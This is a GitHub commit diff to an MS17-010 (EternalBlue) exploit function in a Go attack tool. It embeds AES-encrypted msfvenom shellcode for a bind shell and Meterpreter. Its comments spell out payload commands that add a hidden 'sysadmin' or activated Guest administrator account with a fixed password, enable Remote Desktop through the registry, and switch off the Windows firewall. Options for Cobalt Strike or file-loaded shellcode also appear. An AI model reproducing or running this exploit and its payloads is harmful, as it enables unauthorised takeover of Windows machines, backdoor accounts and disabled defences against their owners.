Update ms17010-exp.go

影舞者 2022-11-21 10:35:00 +08:00 committed by GitHub
parent 769fc59fd1
commit 1166e24092
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 14 deletions


@ -13,32 +13,25 @@ import (
"time"
)
func MS17010EXP(info *common.HostInfo) {
address := info.Host + ":445"
var sc string
var sc_enc string
switch common.SC {
case "bind":
//msfvenom -p windows/x64/shell/bind_tcp LPORT=65432 -f hex
sc_enc = "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"
sc = AesDecrypt(sc_enc,key)
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
sc = AesDecrypt(sc_enc, key)
case "cs":
//cs gen C shellcode -> fmt.Printf("%x", c) -> hex
sc = ""
case "add":
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
sc_enc = "+w7eqC9F3rooElUlkRIf1tMg3KRpITKJdr1gjhO38bzwuDjLOdukKCR3Std9dzwcUZMUISTfilK/XkPhSjGFe63XGjDnZdr6b+IrB6CRbO/PYUJd7c7xKFKhr52DJFts/m4RHW6Ka0k/j8OqO9VmI75ze6A34QXtTLgV+zzPNImjzCeY5Cf4h0VZI32v280faebVOUFZ77v4OJMnDad4S1/fpbDLeHObigG5K9lzmZfvBGz+PySW2YONb3lBPlAtO1jD62ySX/Nj2Jec/QKmDxQuryEvlAgU0bZxV6Z1XCdJO+HLMLrxu1AhuGp/BsXzoixhUjWPBBJMeyPe+EiAtn27pwI2QCinBqMuK/mYW96Pf+qW4y4X001+dzp8snb76BRFqbsV+Wh0Ot5ctEqyCrI5gfP5rWCqjgqLHdTWNKWCeE9aZs6Lxl6J6f6XMoFKJ/b/Xc279ak+zJcdzi+BGHNCnlFGR+SZtVVm3ASYmw0OzRmbztyt4DRcxlRV+7EFdsGzerbdLz+hoURk6tUBluSfV2yo+qch/QJ7CXRgFR5STd+9Emj3zNAg8LLK7u/lv8tr0GCcAC0BMdozPnCzj/AkWidL7/1xojCdQ8s3stm0Dn8YTo6RX3GcPIduoIo2ge4KP6ADvAsQ8pekrUTkmC3pNGT3hDiT2Li84GQ0BhQqih7BItuE4hpHwGhnq+6ij9AGS3xdBS/NqODMU54WOeoqUrSp+nLN9n61qbXHr83q1PmNJFYJ5ptNobeicwWcHxZADHpT3O8KU5H9nsYNfnlABv1FGA2tgWaZjA4iqgzNGQF2dnFWAxUIxwaF3C+DLrvu8WONZaEYlnI7THq/xxGitHt8OnN5AY8FKU8zq6FQt4kRfOm5TO4pACbSKm/9n7EOXZ78GuMYeFaW56xqdJjFsbHvi8yJLIn9hOBjoSPL6Hg+cNijhayKMUc7rtLiqQd81kPaX7xDMusufsiekIySeWjWXZlQt+0tBveK56zzUGJIjAFaKK+VtPZcRyoFiU598OeS0ZPO3UP+nKi0uvhTEnT7KBjE4xAEHvX41P3u9lJIeaIewbqgsHgDSOrU1StCfqT+xO5Ltyy+1e2jDT2H2nquN9BGvdfxsNaGYnsodliKpmL77LsZAFdXyiiAu1Xb5DJhwJGO1Zi156HMC3tGWer5SF5M5H/ufENNxds632lqew2C7dkgLuEMDr+URldG2JMozhHc0u1VkqqlrbVEqnjNU+4D0Gne9pCVd06UhrrRDO6DdfFaYAfp+rz0EURo6CSoMsVIkJETPaVEhHD1qDi7S4p98Mu8aYnzBQpf9uUULrI3UQWHsGfG7iXVLCPwX6zUVE5LYb7JUsAFxvdoGbHjUMOJXGfM4HMQXB1PXXzQmyvLGDLNeLJ71EgE"
sc = AesDecrypt(sc_enc,key)
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xOs7UApLzuCcE52FhTIjY+ckzBVinUHHwwc4QyY6Xo/15ATcQoL7ZiQgii3xFhrJQGnHgQBsmqT/0A1YBa+rrvIIzblF3FDRlXwAvUVTKnCjDJV9NeiS78jgtx6TNlBDyKCy29E3WGbMKSMH2a+dmtjBhmJ94O8GnbrHyd5c8zxsNXRBaYBV/tVyB9TDtM9kZk5QTit+xN2wOUwFa9cNbpYak8VH552mu7KISA1dUPAMQm9kF5vDRTRxjVLqpqHOc+36lNi6AWrGQkXNKcZJclmO7RotKdtPtCayNGV7/pznvewyGgEYvRKprmzf6hl+9acZmnyQZvlueWeqf+I6axiCyHqfaI+ADmz4RyJOlOC5s1Ds6uyNs+zUXCz7ty4rU3hCD8N6v2UagBJaP66XCiLOL+wcx6NJfBy40dWTq9RM0a6b448q3/mXZvdwzj1Evlcu5tDJHMdl+R2Q0a/1nahzsZ6UMJb9GAvMSUfeL9Cba77Hb5ZU40tyTQPl28cRedhwiISDq5UQsTRw35Z7bDAxJvPHiaC4hvfW3gA0iqPpkqcRfPEV7d+ylSTV1Mm9+NCS1Pn5VDIIjlClhlRf5l+4rCmeIPxQvVD/CPBM0NJ6y1oTzAGFN43kYqMV8neRAazACczYqziQ6VgjATzp0k8"
sc = AesDecrypt(sc_enc, key)
case "guest":
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user Guest /active:yes && net user Guest "1qaz@WSX!@#4" && net localgroup Administrators Guest /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
sc_enc = "aZ6HT8SGMKV04q20dOnyPK9qjjUZ4mq6l9SOxMKj0K4lzrg1xPglYpF+v97tP3F9ViX/X44PY0NKKhJgtlWMAYV+lsvIrCyxdhxk+venYJW8R0Cw5vTbuaXlnWmba2ZbUrnZpoJVfJpJNjBnTNFkedK3LCFYLyPBJtwbaT5azGUmO0pkOtGthnPx4C5eUhplZihuJAD/pNtcJ71o/rLkw+JH0Mz+5DzN5T+dbAi8LuBtGMYBaVRtSVrZ+ZZtWEf8ZT1UIMD7druVl+elrJ5LBgcUU9hdH61cPUYgsPaytwxOG9BCJKasdW++NthXGlR6vO0JtJUHnYuFm1saHOkSYAn5U96LkAMYIZ78P7M2upUKnOah/ND5W06yW8oYdGVq7ACsyjrf8UNkVSpedg9EMRwKBJi2wEAzfUkl+USH7gOhbzm2D/ctz2CZEldptuu25jppiVqe2v7MKSRkp1WVipAywemUjZZ9OfDY+jOD6dB5w+vDy++7YJuwtK1ANdUVHhhgxHbfV/2/EtKrm76y/PJTGxTVObnJcajrP5mRy/7hDDo/i+sreXD92TQc1qbEvfi/7oJLy4OTvdTt1/tfSdr9pnQZPqD6gIgSHUvKb1McLL8JS3VgUMW5aSV+7CIAAIPrn+G4B6hH1+Bb0z0AIEnciCml2GUXj56fGwCT9rH7ONKpgwWYxmFi5qFF2Znts/UOsPGXWnOjW7fbX5YdkqfbsbNdfy69eRVi6xqRJ0gJU7GHoyl9mWqGz2VcRe1tU6BusAVe3vEToCtgUpCltPKk8Bci3P86mlzDRGpnFMXtvBf+4/BvAPRy3SgbddGcBq/TR+kol420b5Vk5qKs5dwtOrMp0V99VqfyxriqUSB42oA3gNlaSbwcttQzXX918DAgBlHIrVO+QaOQNBkTdvNLPWT1slW62jNjtmQz63TFrlz5qRmjE0tOPquZxB9z0NGqhLkG2vHfPmCMG2g9vHpXCDoKeVB0Hf2Air5MMPr8I426/DTHIQMMxMyC0IRz0MAcXh7W0Je5S42F2dfTc4VOnScCFUrlzLJw9QxyoDN6XJyr54Lu+GGhS+pDPwKLhhs+CK5Crl2CYLqMG1AoSrveY7+okMIYUhinXuC9V80SYDUXWg3E+PH34ULftgsemNhLmY2VxlO6vDZu28cRybrB6wvt0yeOECzYMIwrRCD73s+nIclbiiynBl7EfNo1ICwzpVMalHum11OObK7zBC7Wu/dAnoj0fs5phgoh9TNpmNDZRPWnT/SxoBOau6TZKAq/wiTyXbfRmL10jWmKnnVdr264863of/jiKm9X/RqMCrt9ECrX6XJckSAxFSry"
sc = AesDecrypt(sc_enc,key)
sc_enc := "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"
sc = AesDecrypt(sc_enc, key)
default:
if strings.Contains(common.SC, "file:") {
read, err := ioutil.ReadFile(common.SC[5:])